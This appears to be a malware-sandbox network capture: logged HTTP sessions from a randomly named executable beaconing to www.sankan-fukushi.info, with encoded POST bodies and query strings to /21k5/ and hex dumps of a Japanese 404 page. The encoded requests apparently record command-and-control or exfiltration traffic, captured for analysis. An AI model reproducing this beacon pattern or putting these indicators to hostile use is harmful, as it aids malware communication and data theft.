                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 6d 6f 35 63 4c 43 4c 37 45 64 2f 67 4e 6f 61 67 37 73 72 5a 36 51 4c 78 4a 70 43 36 52 63 46 36 4c 47 41 33 51 37 68 68 55 2f 58 65 76 34 41 67 34 6c 71 52 75 46 70 52 74 64 6a 75 4b 4b 57 75 71 52 53 79 63 6f 36 31 65 52 63 71 46 76 50 33 6a 59 63 6c 32 63 65 6f 6a 48 77 4d 55 39 56 32 44 50 4e 4f 62 63 38 61 34 65 39 59 6a 67 5a 39 4c 31 35 77 49 79 77 4f 35 57 44 4c 50 66 6e 32 7a 55 2f 76 45 7a 62 2f 50 59 5a 31 38 2b 56 4b 30 38 51 33 43 6c 6d 6c 46 31 6b 72 63 79 4c 6e 72 78 34 59 30 73 70 76 2f 53 67 68 70 73 6f 70 44 4e 33 48 77 73 4e 58 56 46 61 6c 41 3d
                                                            Data Ascii: wVb0=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18+VK08Q3ClmlF1krcyLnrx4Y0spv/SghpsopDN3HwsNXVFalA=
                                                            Dec 5, 2024 19:40:09.421608925 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:09.421771049 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                            Dec 5, 2024 19:40:09.421782017 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                            Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                            Dec 5, 2024 19:40:09.421875954 CET1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                            Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                            Dec 5, 2024 19:40:09.421888113 CET896INData Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                            Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                            Dec 5, 2024 19:40:09.421905041 CET1236INData Raw: 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 2e 38 32 34 2e 33 30 38 2d 34 2e 38 35 38 20 31 2e 39 35 35 2d 39 2e 35 33 36 20 34 2e
                                                            Data Ascii: 933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2.18 2.009 3.635 1.7.646.041 1
                                                            Dec 5, 2024 19:40:09.421916008 CET1236INData Raw: 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d 2e 35 37 2d 2e 37 30 38 2d 31 2e 35 38 2d 2e 38 37 36 2d 32 2e 33 34 39 2d 2e 33 39 31
                                                            Data Ascii: .088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668
                                                            Dec 5, 2024 19:40:09.421926975 CET1236INData Raw: 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37 2e 30 33 37 2d 31 2e 32 38 36 2d 2e 31 36 31 2d 31 2e 38 2d 2e 35 35 37 76 2d 2e 30 37
                                                            Data Ascii: 2-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.23
                                                            Dec 5, 2024 19:40:09.422504902 CET1236INData Raw: 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37 33 6c 2d 34 2e 31 31 35 20 31 2e 34 36 2d 34 2e 31 31 35 2d 31 2e 35 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d
                                                            Data Ascii: "/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-
                                                            Dec 5, 2024 19:40:09.422517061 CET1236INData Raw: 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39 2d 32 2e 33 36 37 2d 32 2e 34 31 36 2d 34 2e 38 33 2d 33 2e 33 34 32 2d 37 2e 33 36 36 2d 31 2e 38 37 36 2d 35 2e 32 34 32 2d 33 2e 31 33 33 2d 31 30 2e 36 38 36 2d 33 2e 37
                                                            Data Ascii: 14-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.2
                                                            Dec 5, 2024 19:40:09.542701006 CET1031INData Raw: 39 31 2e 35 33 37 2e 36 35 33 20 31 2e 34 35 35 20 31 2e 34 2e 35 35 39 2e 35 34 37 20 37 2e 34 31 37 20 37 2e 31 38 37 2d 33 2e 32 38 39 20 32 2e 31 36 2d 39 2e 38 38 32 20 36 2e 34 35 38 2d 35 2e 31 32 35 2d 31 33 2e 33 30 38 7a 6d 32 34 2e 32
                                                            Data Ascii: 91.537.653 1.455 1.4.559.547 7.417 7.187-3.289 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749846163.44.185.183806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:10.670095921 CET1868OUTPOST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 2b 6f 34 75 44 43 4a 59 73 64 77 41 4e 6f 5a 67 37 74 72 5a 37 56 4c 77 68 6c 43 36 63 2b 46 2b 37 47 41 56 49 37 70 77 55 2f 64 65 76 34 43 67 34 34 6b 78 75 55 70 53 56 5a 6a 75 61 4b 57 75 71 52 53 77 45 6f 34 6b 65 52 61 71 46 73 66 48 6a 4d 59 6c 32 34 65 6f 4c 58 77 4d 51 44 56 46 4c 50 4e 71 2f 63 77 4a 41 65 30 59 6a 69 59 39 4b 6d 35 77 56 69 77 4f 6c 73 44 4b 4c 31 6e 31 54 55 2f 75 78 4e 42 37 37 48 47 32 6f 39 61 71 6f 68 52 55 43 71 6d 55 77 49 72 6f 6b 51 46 45 2f 56 77 71 49 2f 6e 61 4b 76 67 7a 52 46 74 61 48 46 34 43 4a 67 53 6c 78 38 4d 78 73 71 54 74 65 4a 41 6c 35 46 6d 65 78 54 67 41 55 66 78 36 4b 65 44 6e 5a 70 66 4f 6c 66 37 49 54 41 35 61 52 4d 55 33 50 39 75 31 50 38 79 68 43 2b 67 76 67 78 55 76 53 56 48 4a 39 31 30 42 7a 36 48 37 35 4f 46 76 52 57 46 59 37 6c 58 65 65 6e 62 70 59 64 63 57 48 5a 6f 42 62 44 48 37 6d 49 76 4c 39 73 65 [TRUNCATED]
                                                            Data Ascii: wVb0=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRIt+o4uDCJYsdwANoZg7trZ7VLwhlC6c+F+7GAVI7pwU/dev4Cg44kxuUpSVZjuaKWuqRSwEo4keRaqFsfHjMYl24eoLXwMQDVFLPNq/cwJAe0YjiY9Km5wViwOlsDKL1n1TU/uxNB77HG2o9aqohRUCqmUwIrokQFE/VwqI/naKvgzRFtaHF4CJgSlx8MxsqTteJAl5FmexTgAUfx6KeDnZpfOlf7ITA5aRMU3P9u1P8yhC+gvgxUvSVHJ910Bz6H75OFvRWFY7lXeenbpYdcWHZoBbDH7mIvL9seTnsMcIL0FSmnAjx3Gco9ZIDm+YaYgRVgIeycPyqRgpaSiD7YwcPVuBdiyPGlA4Otx5vkK7+7lm0eG2h+N3Ori/DxeYGDzb6qTloQNwfntxlL47rEhv62VmDnDiEK0+jLW37el0c1o874e/H7NxTIdLCMoKxws/+GyZpvcN/aHN7o504mDKKeOXscKIKyuXIP2hn8SzBYL4zajbjgJoHFS5e/PQHfuMr0KLjAnWL63AxuAidupib/+HuBRYO7Nx8NsZweY7MiIF1Hh5cah5Vg31zyPosCpkWkfnTrIjZKWhnLrgLMY41FPjGdqtclDOkbDiBrwtMfuOoTafjL2q9HHPotP6w9kFz02jJU9tDH5edEEoqkE+TarOzGWpsT3SU+LneX8TqZbTIDL18T3+QXhLOUl+SNUPziiQOWvxjwiu+0I0MJxEYnupeO6VzQhlmwhqyH8deXux8FdUj5zvAwfkRyajiKnRwTpYST/RnLnT+V1pL1qvh7wb1DTi6ESoxsz53OCbZpLuW+QXilPgiwVK0+f8UuvoM+K4ikS8Lp8jJKjVAKqTjtI+L//yzi8hs6/bZJSA3GgkrwSrkeBUid5poenoj/oXAE4d4l9cK11CTsgEi/eoBybOeM7QjmzZvbFX/1v+r0HE4M6/GmT0/mP5WoQZPcY14bG8 [TRUNCATED]
                                                            Dec 5, 2024 19:40:12.253809929 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:12.253829002 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                            Dec 5, 2024 19:40:12.253845930 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                            Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                            Dec 5, 2024 19:40:12.253895998 CET224INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                            Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute;
                                                            Dec 5, 2024 19:40:12.253907919 CET1236INData Raw: 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79
                                                            Data Ascii: z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color: #fc3 transparent; }
                                                            Dec 5, 2024 19:40:12.253918886 CET224INData Raw: 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 2d 68 6f 6c 69
                                                            Data Ascii: @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right { margi
                                                            Dec 5, 2024 19:40:12.253940105 CET1236INData Raw: 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72
                                                            Data Ascii: n-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> //
                                                            Dec 5, 2024 19:40:12.253958941 CET1236INData Raw: 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36 2e 39 32 33 20 31 34 2e 33 38 31 2d 31 30 2e 34 33 20 32 37 2e 33 2d 31
                                                            Data Ascii: 56-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727
                                                            Dec 5, 2024 19:40:12.254209042 CET1236INData Raw: 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 2e 34 37 36 68 2d 31 33 2e 33 39 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23
                                                            Data Ascii: fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-
                                                            Dec 5, 2024 19:40:12.254220009 CET1236INData Raw: 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e 36 37 33 2d 2e 37 31 38 20 35 2e 35 35 34 20 30 20 2e 39 33 33 20 30 20 31 2e 39 32 36 2d 2e 30 37 35 20 33 2e 30 31 2d 2e 30 37 35 20
                                                            Data Ascii: 15 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749852163.44.185.183806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:13.334870100 CET556OUTGET /21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:40:14.756237030 CET192INHTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Dec 5, 2024 19:40:14.756263971 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0;
                                                            Dec 5, 2024 19:40:14.756285906 CET1236INData Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ter; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                            Dec 5, 2024 19:40:14.756300926 CET1236INData Raw: 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: ical-align: middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-
                                                            Dec 5, 2024 19:40:14.756536007 CET636INData Raw: 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20
                                                            Data Ascii: h: 100%; } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; }
                                                            Dec 5, 2024 19:40:14.756547928 CET1236INData Raw: 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 e3 82 b3 e3 83 94 e3 83 bc e3 83 a9 e3 82 a4 e3 83 88 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20
                                                            Data Ascii: style> <script type="text/javascript"> // function setCopyrights () { document.write('copyright(c)2001-' + ' <a href="https://pepabo.com/" target="_blank">GMO</a> all rights reserved'
                                                            Dec 5, 2024 19:40:14.756560087 CET1236INData Raw: 33 2e 35 34 35 2d 31 35 2e 32 38 39 2d 32 31 2e 33 35 36 2d 33 31 2e 37 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37
